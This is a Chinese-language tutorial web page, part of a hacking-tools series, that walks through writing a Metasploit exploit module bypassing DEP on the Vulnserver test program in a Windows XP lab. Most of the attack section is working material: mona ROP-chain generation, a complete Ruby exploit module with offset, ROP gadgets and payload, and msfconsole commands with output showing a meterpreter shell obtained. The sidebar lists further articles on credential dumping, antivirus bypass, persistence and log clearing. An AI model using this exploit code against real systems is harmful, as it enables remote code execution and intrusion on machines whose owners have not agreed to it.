href="/md/hack/tools/2022-04-17-010-字典生成工具Crunch的使用案例.html" class="sidebar-link">字典生成工具Crunch的使用案例</a></li><li><a href="/md/hack/tools/2022-04-17-011-WinlogonHack获取系统密码.html" class="sidebar-link">WinlogonHack获取系统密码</a></li><li><a href="/md/hack/tools/2022-04-17-012-Msfvenom生成各类Payload命令.html" class="sidebar-link">Msfvenom生成各类Payload命令</a></li><li><a href="/md/hack/tools/2022-04-17-013-PsExec下载地址及其用法.html" class="sidebar-link">PsExec下载地址及其用法</a></li><li><a href="/md/hack/tools/2022-04-17-014-Hydra安装Libssh模块.html" class="sidebar-link">Hydra安装Libssh模块</a></li><li><a href="/md/hack/tools/2022-04-17-015-利用procdump+Mimikatz绕过杀软获取Windows明文密码.html" class="sidebar-link">利用procdump+Mimikatz 绕过杀软获取Windows明文密码</a></li><li><a href="/md/hack/tools/2022-04-17-016-SQLMap的用法+谷歌黑客语法.html" class="sidebar-link">SQLMap的用法+谷歌黑客语法</a></li><li><a href="/md/hack/tools/2022-04-17-017-SQLMap用法总结.html" class="sidebar-link">SQLMap用法总结</a></li><li><a href="/md/hack/tools/2022-04-17-018-SQLMap参数说明.html" class="sidebar-link">SQLMap参数说明</a></li><li><a href="/md/hack/tools/2022-04-17-019-十大渗透测试演练系统.html" class="sidebar-link">十大渗透测试演练系统</a></li><li><a href="/md/hack/tools/2022-04-17-020-目录扫描神器DirBuster用法.html" class="sidebar-link">目录扫描神器DirBuster用法</a></li><li><a href="/md/hack/tools/2022-04-17-021-NMap在实战中的常见用法.html" class="sidebar-link">NMap在实战中的常见用法</a></li><li><a href="/md/hack/tools/2022-04-17-022-Metasploit模块的格式说明.html" class="sidebar-link">Metasploit模块的格式说明</a></li><li><a href="/md/hack/tools/2022-04-17-023-Meterpreter命令大全.html" class="sidebar-link">Meterpreter命令大全</a></li><li><a href="/md/hack/tools/2022-04-17-024-Metasploit-Meterpreter-Shell信息收集相关的命令.html" class="sidebar-link">Metasploit-Meterpreter-Shell信息收集相关的命令</a></li><li><a href="/md/hack/tools/2022-04-17-025-使用Metasploit编写绕过DEP渗透模块.html" class="active sidebar-link">使用Metasploit编写绕过DEP渗透模块</a></li><li><a href="/md/hack/tools/2022-04-17-026-Metasploit渗透php-utility-belt程序.html" class="sidebar-link">Metasploit渗透php-utility-belt程序</a></li><li><a href="/md/hack/tools/2022-04-17-027-内网IPC$入侵.html" class="sidebar-link">内网IPC$入侵</a></li><li><a href="/md/hack/tools/2022-04-17-028-Metasploit渗透BSPlayerV2.68.html" class="sidebar-link">Metasploit渗透BSPlayer V2.68</a></li><li><a href="/md/hack/tools/2022-04-17-029-Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网.html" class="sidebar-link">Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网</a></li><li><a href="/md/hack/tools/2022-04-17-030-Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网.html" class="sidebar-link">Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网</a></li><li><a href="/md/hack/tools/2022-04-17-031-Metasploit攻击HFS2.3上的漏洞.html" class="sidebar-link">Metasploit攻击HFS2.3上的漏洞</a></li><li><a href="/md/hack/tools/2022-04-17-032-Metasploit访问控制的持久化.html" class="sidebar-link">Metasploit访问控制的持久化</a></li><li><a href="/md/hack/tools/2022-04-17-033-Metasploit清除渗透痕迹.html" class="sidebar-link">Metasploit清除渗透痕迹</a></li><li><a href="/md/hack/tools/2022-04-17-034-利用Metasploit找出SCADA服务器.html" class="sidebar-link">利用Metasploit找出SCADA服务器</a></li><li><a href="/md/hack/tools/2022-04-17-035-利用Metasploit渗透DATAC-RealWin-SCADA Server2.0.html" class="sidebar-link">利用Metasploit渗透DATAC-RealWin-SCADA Server2.0</a></li><li><a href="/md/hack/tools/2022-04-17-036-MSF-Meterpreter清理日志.html" class="sidebar-link">MSF-Meterpreter清理日志</a></li><li><a href="/md/hack/tools/2022-04-17-037-Metasploit自定义FTP扫描模块.html" class="sidebar-link">Metasploit自定义FTP扫描模块</a></li><li><a href="/md/hack/tools/2022-04-17-038-Metasploit渗透MSSQL.html" class="sidebar-link">Metasploit渗透MSSQL</a></li><li><a href="/md/hack/tools/2022-04-17-039-Metasploit渗透VOIP.html" class="sidebar-link">Metasploit渗透VOIP</a></li><li><a href="/md/hack/tools/2022-04-17-040-破解工具hydra安装与使用.html" class="sidebar-link">破解工具hydra安装与使用</a></li><li><a href="/md/hack/tools/2022-04-17-041-Metasploit自定义SSH认证暴力破解器.html" class="sidebar-link">Metasploit自定义SSH认证暴力破解器</a></li><li><a href="/md/hack/tools/2022-04-17-042-Metasploit自定义让磁盘失效的后渗透模块.html" class="sidebar-link">Metasploit自定义让磁盘失效的后渗透模块</a></li><li><a href="/md/hack/tools/2022-04-17-043-PowerShell基本命令和绕过权限执行.html" class="sidebar-link">PowerShell基本命令和绕过权限执行</a></li><li><a href="/md/hack/tools/2022-05-02-001-Metasploit自定义收集登录凭证的后渗透模块.html" class="sidebar-link">Metasploit自定义收集登录凭证的后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-002-利用Java生成穷举字典(数字+字母(大小写)+字符).html" class="sidebar-link">利用Java生成穷举字典(数字+字母(大小写)+字符)</a></li><li><a href="/md/hack/tools/2022-05-02-003-PowerShell工具之Powerup详解实录.html" class="sidebar-link">PowerShell工具之Powerup详解实录</a></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter以被控制的计算机为跳板渗透其他服务器.html" class="sidebar-link">Meterpreter以被控制的计算机为跳板渗透其他服务器</a></li><li><a href="/md/hack/tools/2022-05-02-005-Win10完美去除桌面快捷图标小箭头.html" class="sidebar-link">Win10完美去除桌面快捷图标小箭头</a></li><li><a href="/md/hack/tools/2022-05-02-006-OpenVAS8.0-Vulnerability-Scanning.html" class="sidebar-link">OpenVAS 8.0 Vulnerability Scanning</a></li><li><a href="/md/hack/tools/2022-05-02-007-kali-Metasploit连接Postgresql默认密码.html" class="sidebar-link">kali Metasploit 连接 Postgresql 默认密码</a></li><li><a href="/md/hack/tools/2022-05-02-008-使用OpenVAS进行漏洞扫描.html" class="sidebar-link">kali 使用OpenVAS进行漏洞扫描</a></li><li><a href="/md/hack/tools/2022-05-02-009-对威胁建模附加搭建CVE2014-6287漏洞环境.html" class="sidebar-link">kali 对威胁建模(附加搭建CVE:2014-6287漏洞环境)</a></li><li><a href="/md/hack/tools/2022-05-02-010-Metasploit设置永久访问权限.html" class="sidebar-link">kali Metasploit设置永久访问权限</a></li><li><a href="/md/hack/tools/2022-05-02-011-Empire反弹回Metasploit.html" class="sidebar-link">Empire 反弹回 Metasploit</a></li><li><a href="/md/hack/tools/2022-05-02-012-Metasploit制作并运行自定义Meterpreper脚本.html" class="sidebar-link">Metasploit制作并运行自定义Meterpreper脚本</a></li><li><a href="/md/hack/tools/2022-05-02-013-使用Metasploit实现对缓冲区栈的溢出攻击.html" class="sidebar-link">使用Metasploit实现对缓冲区栈的溢出攻击</a></li><li><a href="/md/hack/tools/2022-05-02-014-使用Metasploit实现基于SEH的缓冲区溢出攻击.html" class="sidebar-link">使用Metasploit实现基于SEH的缓冲区溢出攻击</a></li><li><a href="/md/hack/tools/2022-05-02-015-Metasploit基本后渗透命令.html" class="sidebar-link">Metasploit基本后渗透命令</a></li><li><a href="/md/hack/tools/2022-05-02-016-Metasploit高级后渗透模块.html" class="sidebar-link">Metasploit高级后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-017-Kali中一键更新Metasploit框架.html" class="sidebar-link">Kali中一键更新Metasploit框架</a></li><li><a href="/md/hack/tools/2022-05-02-018-Metasploit其他后渗透模块.html" class="sidebar-link">Metasploit其他后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-019-Metasploit高级扩展功能.html" class="sidebar-link">Metasploit高级扩展功能</a></li><li><a href="/md/hack/tools/2022-05-02-020-Metasploit之pushm和popm命令.html" class="sidebar-link">Metasploit之pushm和popm命令</a></li><li><a href="/md/hack/tools/2022-05-02-021-Metasploit使用reload-edit-reload_all命令加快开发过程.html" class="sidebar-link">Metasploit使用reload、edit、reload_all命令加快开发过程</a></li><li><a href="/md/hack/tools/2022-05-02-022-Metasploit资源脚本的使用方法.html" class="sidebar-link">Metasploit资源脚本的使用方法</a></li><li><a href="/md/hack/tools/2022-05-02-023-在Metasploit中使用AutoRunScript.html" class="sidebar-link">在Metasploit中使用AutoRunScript</a></li><li><a href="/md/hack/tools/2022-05-02-024-使用Metasploit获取目标的控制权限.html" class="sidebar-link">使用Metasploit获取目标的控制权限</a></li><li><a href="/md/hack/tools/2022-05-02-025-使用Metasploit中的NMap插件扫描并渗透内网主机.html" class="sidebar-link">使用Metasploit中的NMap插件扫描并渗透内网主机</a></li><li><a href="/md/hack/tools/2022-05-02-026-Kali一句话升级Metasploit的命令.html" class="sidebar-link">Kali一句话升级Metasploit的命令</a></li><li><a href="/md/hack/tools/2022-05-02-027-Win2012R2打Windows8.1-KB2919355.html" class="sidebar-link">Win2012R2打Windows8.1-KB2919355</a></li><li><a href="/md/hack/tools/2022-05-02-028-Armitage基本原理.html" class="sidebar-link">Armitage基本原理</a></li><li><a href="/md/hack/tools/2022-05-02-029-Armitage网络扫描以及主机管理.html" class="sidebar-link">Armitage网络扫描以及主机管理</a></li><li><a href="/md/hack/tools/2022-05-02-030-使用Armitage进行渗透.html" class="sidebar-link">使用Armitage进行渗透</a></li><li><a href="/md/hack/tools/2022-05-02-031-使用Armitage进行后渗透攻击.html" class="sidebar-link">使用Armitage进行后渗透攻击</a></li><li><a href="/md/hack/tools/2022-05-02-032-使用Armitage进行客户端攻击.html" class="sidebar-link">使用Armitage进行客户端攻击</a></li><li><a href="/md/hack/tools/2022-05-02-033-Armitage脚本编写.html" class="sidebar-link">Armitage脚本编写</a></li><li><a href="/md/hack/tools/2022-05-02-034-Armitage控制Metasploit.html" class="sidebar-link">Armitage控制Metasploit</a></li><li><a href="/md/hack/tools/2022-05-02-035-Armitage使用Cortana实现后渗透攻击.html" class="sidebar-link">Armitage使用Cortana实现后渗透攻击</a></li><li><a href="/md/hack/tools/2022-05-02-036-Armitage使用Cortana创建自定义菜单.html" class="sidebar-link">Armitage使用Cortana创建自定义菜单</a></li><li><a href="/md/hack/tools/2022-05-02-037-Armitage界面的使用.html" class="sidebar-link">Armitage界面的使用</a></li><li><a href="/md/hack/tools/2022-05-02-038-tcpdump用法说明.html" class="sidebar-link">tcpdump用法说明</a></li></ul></section></li></ul> </aside> <div><main class="page"> <div class="theme-default-content content__default"><h1 id="使用metasploit编写绕过dep渗透模块"><a href="#使用metasploit编写绕过dep渗透模块" class="header-anchor">#</a> 使用Metasploit编写绕过DEP渗透模块</h1> <p>攻击机 Kali 192.168.109.137</p> <p>靶机 WinXP 192.168.109.141 (也可为其他Win系统，设置为DEP保护)</p> <p>应用程序 Vulnserver(可以到链接： https://download.csdn.net/download/l1028386804/10921905 下载)</p> <h2 id="将靶机设置dep保护"><a href="#将靶机设置dep保护" class="header-anchor">#</a> 将靶机设置DEP保护</h2> <p>**数据执行保护（Data Execution Prevention，DEP）**是一种将特定内存区域标记为不可执行的保护机制，这种机制会导致我们在渗透过程中无法执行ShellCode。因此，即使我们可以改写EIP寄存器中的内容并成功地将ESP指向了ShellCode的起始地址，也无法执行攻击载荷。这是因为DEP的存在组织了内存中可写区域（例如栈和堆）中数据的执行。在这种情况下，我们必须使用可执行区域中的现存指令实现预期的功能——可以通过将所有的可执行指令放置成一个可以让跳转跳到ShellCode的顺序来实现这一目的。</p> <p>绕过DEP的技术被称为返回导向编程（Return Oriented Programming，ROP）技术，它不同于通过覆盖改写EIP内容，并跳转到ShellCode栈溢出的普通方法。当DEP启用之后，我们将无法使用这种技术，因为栈中的数据是不能执行的。因此我们不再跳转到ShellCode，而是调用第一个ROP指令片段（gadget）。这些指令片段共同构成一个链式结构，一个指令片段会返回下一个指令片段，而不执行栈中的任何代码。</p> <p>具体操作如下：</p> <p>右键&quot;我的电脑&quot;-&gt;属性-&gt;高级-&gt;性能设置-&gt;数据执行保存-&gt;选择“为除下列选定程序之外的所有程序和服务启用DEP (U)”-&gt;确定</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125342351.png" loading="lazy" class="lazy"></p> <h2 id="开启vlunserver监听"><a href="#开启vlunserver监听" class="header-anchor">#</a> 开启Vlunserver监听</h2> <p>在靶机的命令行中切换到vlunserver.exe所在的目录，执行如下命令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>vlunserver.exe 9999
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>监听9999端口</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125430253.png" loading="lazy" class="lazy"></p> <h2 id="开启immunitydebugger"><a href="#开启immunitydebugger" class="header-anchor">#</a> 开启ImmunityDebugger</h2> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125458129.png" loading="lazy" class="lazy"></p> <h2 id="将vulnserver进程加载到immunitydebugger"><a href="#将vulnserver进程加载到immunitydebugger" class="header-anchor">#</a> 将Vulnserver进程加载到ImmunityDebugger</h2> <p>依次选择ImmunityDebugger的File-&gt;Attach</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125523794.png" loading="lazy" class="lazy"></p> <p>显示靶机所有进程的信息</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125536289.png" loading="lazy" class="lazy"></p> <p>我们选中Vulnserver进程并单击右下角的Attach按钮</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125551775.png" loading="lazy" class="lazy"></p> <p>显示Vulnserver进程的运行信息</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125607172.png" loading="lazy" class="lazy"></p> <p>此时看到Vulnserver进程处于暂停状态，我们需要点击ImmunityDebugger的Play按钮</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125620946.png" loading="lazy" class="lazy"></p> <p>此时，看到Vulnserver处于运行状态</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125639410.png" loading="lazy" class="lazy"></p> <h2 id="查找vulnserver运行时加载的所有dll信息"><a href="#查找vulnserver运行时加载的所有dll信息" class="header-anchor">#</a> 查找Vulnserver运行时加载的所有DLL信息</h2> <p>在ImmunityDebugger的命令行输入如下命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>!mona modules
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125708628.png" loading="lazy" class="lazy"></p> <h2 id="将msvcrt-dll上传到kali的-root目录下"><a href="#将msvcrt-dll上传到kali的-root目录下" class="header-anchor">#</a> 将msvcrt.dll上传到Kali的/root目录下</h2> <p>这里我们将靶机的C:\Windows\system32\msvcrt.dll上传到Kali的/root目录下。</p> <h2 id="查找rop指令片段"><a href="#查找rop指令片段" class="header-anchor">#</a> 查找ROP指令片段</h2> <p>这里，我们使用到的工具是Metasploit的msfrop，在Kali的命令行输入：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfconsole
msfrop -v -s &quot;pop cex&quot; /root/msvcrt.dll
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>输出太多，这里只截取一部分：</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125804744.png" loading="lazy" class="lazy"></p> <h2 id="创建rop链"><a href="#创建rop链" class="header-anchor">#</a> 创建ROP链</h2> <p>在ImmunityDebugger命令行输入如下命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>!mona rop -m *.dll -cp nonull
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125843386.png" loading="lazy" class="lazy"></p> <p>执行后会在ImmunityDebugger安装目录下生成一个rop_chains.txt文件</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125857534.png" loading="lazy" class="lazy"></p> <p>我们打开rop_chains.txt文件，找到如下代码片段：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>def create_rop_chain()

  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = 
  [
    0x77bfc038,  # POP ECX # RETN [msvcrt.dll] 
    0x6250609c,  # ptr to &amp;VirtualProtect() [IAT essfunc.dll]
    0x77d5373d,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 
    0x7c96d192,  # XCHG EAX,ESI # RETN [ntdll.dll] 
    0x77c11c54,  # POP EBP # RETN [msvcrt.dll] 
    0x625011bb,  # &amp; jmp esp [essfunc.dll]
    0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
    0x77dc560a,  # XCHG EAX,EBX # RETN [ADVAPI32.dll] 
    0x77f01564,  # POP EAX # RETN [GDI32.dll] 
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
    0x77ef24c8,  # XCHG EAX,EDX # RETN [GDI32.dll] 
    0x77c0eb4f,  # POP ECX # RETN [msvcrt.dll] 
    0x7c99f17e,  # &amp;Writable location [ntdll.dll]
    0x77c17641,  # POP EDI # RETN [msvcrt.dll] 
    0x77e6d224,  # RETN (ROP NOP) [RPCRT4.dll]
    0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
    0x90909090,  # nop
    0x60fe4479,  # PUSHAD # RETN [hnetcfg.dll] 
  ].flatten.pack(&quot;V*&quot;)

  return rop_gadgets

end
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/2019011712593726.png" loading="lazy" class="lazy"></p> <p>之后，将这段代码拷贝到我们自己编写的渗透模块中。</p> <h2 id="编写绕过dep的metasploit模块脚本dep-attack-by-binghe-rb"><a href="#编写绕过dep的metasploit模块脚本dep-attack-by-binghe-rb" class="header-anchor">#</a> 编写绕过DEP的Metasploit模块脚本dep_attack_by_binghe.rb</h2> <p>不多说，直接上代码：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>##
# Author 冰河
# Date 2019-01-16
# Description Metasploit绕过DEP
##

require 'msf/core'
class Metasploit3 &lt; Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::Tcp
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'DEP Bypass Exploit',
      'Description'    =&gt; %q{
        DEP Bypass Using ROP Chains Example Module
      },
      'Platform'       =&gt; 'Windows',
      'Author'         =&gt; ['binghe'],
      'Payload'        =&gt;
        {
          'space'     =&gt; 312,
          'BadChars'  =&gt; &quot;\x00&quot;
        },
       'Targets'      =&gt; 
        [
          ['Windows XP', {'Offset'  =&gt; 2006}]
        ],
        'DisclosureDate'  =&gt; '2019-01-16'))
     
     register_options(
      [
        Opt::RPORT(9999)
      ],self.class)
  end
  
   def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x77bfc038,  # POP ECX # RETN [msvcrt.dll] 
      0x6250609c,  # ptr to &amp;VirtualProtect() [IAT essfunc.dll]
      0x77d5373d,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 
      0x7c96d192,  # XCHG EAX,ESI # RETN [ntdll.dll] 
      0x77c11c54,  # POP EBP # RETN [msvcrt.dll] 
      0x625011bb,  # &amp; jmp esp [essfunc.dll]
      0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
      0x77dc560a,  # XCHG EAX,EBX # RETN [ADVAPI32.dll] 
      0x77f01564,  # POP EAX # RETN [GDI32.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
      0x77ef24c8,  # XCHG EAX,EDX # RETN [GDI32.dll] 
      0x77c0eb4f,  # POP ECX # RETN [msvcrt.dll] 
      0x7c99f17e,  # &amp;Writable location [ntdll.dll]
      0x77c17641,  # POP EDI # RETN [msvcrt.dll] 
      0x77e6d224,  # RETN (ROP NOP) [RPCRT4.dll]
      0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
      0x90909090,  # nop
      0x60fe4479,  # PUSHAD # RETN [hnetcfg.dll] 
    ].flatten.pack(&quot;V*&quot;)

    return rop_gadgets

  end
  
  def exploit
    connect
    rop_chain = create_rop_chain()
    junk = rand_text_alpha_upper(target['Offset'])
    buf = &quot;TRUN .&quot; + junk + rop_chain + make_nops(16) + payload.encoded + '\r\n'
    sock.put(buf)
    handler
    disconnect
  end
  
end
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br><span class="line-number">63</span><br><span class="line-number">64</span><br><span class="line-number">65</span><br><span class="line-number">66</span><br><span class="line-number">67</span><br><span class="line-number">68</span><br><span class="line-number">69</span><br><span class="line-number">70</span><br><span class="line-number">71</span><br><span class="line-number">72</span><br><span class="line-number">73</span><br><span class="line-number">74</span><br><span class="line-number">75</span><br><span class="line-number">76</span><br><span class="line-number">77</span><br><span class="line-number">78</span><br><span class="line-number">79</span><br><span class="line-number">80</span><br></div></div><p>其中，def create_rop_chain()方法就是从第8步创建的rop_chains.txt文件中复制来的。</p> <h2 id="上传脚本dep-attack-by-binghe-rb"><a href="#上传脚本dep-attack-by-binghe-rb" class="header-anchor">#</a> 上传脚本dep_attack_by_binghe.rb</h2> <p>将脚本dep_attack_by_binghe.rb上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/masteringmetasploit目录下。</p> <h2 id="关闭immunitydebugger重新启动vulnserver"><a href="#关闭immunitydebugger重新启动vulnserver" class="header-anchor">#</a> 关闭ImmunityDebugger重新启动Vulnserver</h2> <p>在靶机上关闭ImmunityDebugger并重新启动Vulnserver。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117130049549.png" loading="lazy" class="lazy"></p> <h2 id="在kali上执行"><a href="#在kali上执行" class="header-anchor">#</a> 在Kali上执行</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfconsole
use exploit/windows/masteringmetasploit/dep_attack_by_binghe 
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
ifconfig
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>具体操作如下：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msf &gt; use exploit/windows/masteringmetasploit/dep_attack_by_binghe 
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; set payload windows/meterpreter/bind_tcp
payload =&gt; windows/meterpreter/bind_tcp
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; set RHOST 192.168.109.141
RHOST =&gt; 192.168.109.141
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; show options

Module options (exploit/windows/masteringmetasploit/dep_attack_by_binghe):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.109.141  yes       The target address
   RPORT  9999             yes       The target port (TCP)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.109.141  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows XP


msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; exploit

[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (179779 bytes) to 192.168.109.141

meterpreter &gt; ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface 65539
============
Name         : VMware Accelerated AMD PCNet Adapter
Hardware MAC : 00:0c:29:5d:8e:d4
MTU          : 1500
IPv4 Address : 192.168.109.141
IPv4 Netmask : 255.255.255.0


Interface 65540
============
Name         : Bluetooth �)%
Hardware MAC : 3c:a0:67:1a:fe:b4
MTU          : 1500

meterpreter &gt; 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br></div></div><p>成功拿到Meterpreter的Shell。所以，设置系统的DEP保护，对我们来说并没有什么卵用。</p> <h2 id="写在最后"><a href="#写在最后" class="header-anchor">#</a> 写在最后</h2> <blockquote><p>如果你觉得冰河写的还不错，请微信搜索并关注「 <strong>冰河技术</strong> 」微信公众号，跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术，「 <strong>冰河技术</strong> 」微信公众号更新了大量技术专题，每一篇技术文章干货满满！不少读者已经通过阅读「 <strong>冰河技术</strong> 」微信公众号文章，吊打面试官，成功跳槽到大厂；也有不少读者实现了技术上的飞跃，成为公司的技术骨干！如果你也想像他们一样提升自己的能力，实现技术能力的飞跃，进大厂，升职加薪，那就关注「 <strong>冰河技术</strong> 」微信公众号吧，每天更新超硬核技术干货，让你对如何提升技术能力不再迷茫！</p></blockquote> <p><img alt="" data-src="https://img-blog.csdnimg.cn/20200906013715889.png" loading="lazy" class="lazy"></p></div> <footer class="page-edit"><div class="edit-link"><a href="https://github.com/binghe001/BingheGuide/edit/master/docs/md/hack/tools/2022-04-17-025-使用Metasploit编写绕过DEP渗透模块.md" target="_blank" rel="noopener noreferrer">在 GitHub 上编辑此页</a> <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" 